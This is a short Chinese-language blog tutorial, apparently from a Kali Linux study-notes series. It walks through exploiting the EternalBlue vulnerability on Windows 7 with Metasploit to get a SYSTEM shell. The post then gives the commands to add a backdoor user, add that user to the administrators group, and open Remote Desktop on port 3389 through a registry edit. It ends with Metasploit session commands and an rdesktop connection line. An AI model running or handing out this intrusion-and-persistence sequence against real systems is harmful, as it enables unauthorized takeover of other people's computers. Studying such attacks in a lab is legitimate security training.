kali系统——网络安全v6笔记总结(四)
作者:互联网
利用永恒之蓝漏洞实现w7远程操控
首先目标要关闭防火墙
然后打开Metasploit
输入永恒之蓝漏洞编码
复制运行第二条辅助项目
设置漏洞选项
运行项目,结果为有一个可能是漏洞的w7漏洞
然后选择第三个项目,即***项目,并设置漏洞选项
输入漏洞***命令 exploit
于是我们便进入了对方的w7命令终端,身份为最高权限者system(系统)
下一步我们输入命令net user 用户名 密码 /add来创建一个用户
然后用一个 net localgroup administrators 用户名 /add 命令来将刚才的用户拉入讨论组
然后输入命令 net localgroup administrators 查看管理员
输入命令REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 来开启远程桌面端口3389
/v 所选项之下要添加的值名。
/t RegKey 数据类型
/d 要分配给添加的注册表 ValueName 的数据。
/f 不用提示就强行覆盖现有注册表项。
现在我们就可以利用其他漏洞进行以远程桌面控制为渠道的******了
sessions -l 列出会话
sessions -i <id>选择会话
sessions -k <id> 结束会话
<ctrl> z 把会话放在后台
<ctrl> c 结束会话
kali终端窗口
rdesktop 192.168.4.239:3389 远程连接命令
标签:网络安全,会话,kali,sessions,w7,命令,v6,net,漏洞 来源: https://blog.51cto.com/14216854/2381436